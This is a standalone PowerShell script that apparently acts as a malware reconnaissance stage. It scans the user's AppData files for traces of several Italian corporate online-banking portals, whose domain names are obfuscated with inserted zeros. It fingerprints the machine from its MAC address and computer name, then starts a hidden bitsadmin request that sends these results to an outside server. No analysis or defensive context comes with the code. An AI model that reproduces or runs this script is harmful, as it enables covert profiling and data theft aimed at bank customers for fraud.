cd $env:appdata\..
$n=1;
$b=@("cbi.bper0group.net","busin0ess.bnl.it","ibk.ne0xi.it","inbiz.inte0sasanpaolo.com","bpe0rgroup.net","inb0ank.it","finecob0ank.com");
$o="";
$c="";
for ($i=0;$i -le 6; $i++){
	$rr="";
	$bb=$b[$i] -replace "0"
	$rr=findstr /m /s $bb *.*
	if ($rr.length){
		$o+="1";
		$c="00000000";
	}else{
		$o+="0"
	}
}

if ($c -eq ""){
	$e=@("aziendaonl0ine.mps.it","banking-impr0ese.credem.it","clienti.che0banca.it");
	for ($i=0;$i -le 2; $i++){
		$rr="";
		$bb=$e[$i] -replace "0"
		$rr=findstr /m /s $bb *.*
		if ($rr.length){
			$c+="1";
			
		}else{
			$c+="0"
		}
	}
}

$edfaiu=getmac /fo table | select-object -last 1;
$haha=$edfaiu.substring(0,17);

[Reflection.Assembly]::LoadWithPartialName("System.Web")
$hMD5=[System.Web.Security.FormsAuthentication]::HashPasswordForStoringInConfigFile($haha+$env:ComputerName, "MD5").tolower();

$startup=[wmiclass]"Win32_ProcessStartup"
$startup.Properties['ShowWindow'].value=$False

$MrMeeseeks='bitsadmin /transfer bupl /priority FOREGROUND "https://ghryj.eu/fbf.php?id='+$hMD5+'&f='+$o+'&c='+$c+'" '+$env:temp+'\123.log';	
([wmiclass]"win32_Process").create($MrMeeseeks,'.',$Startup)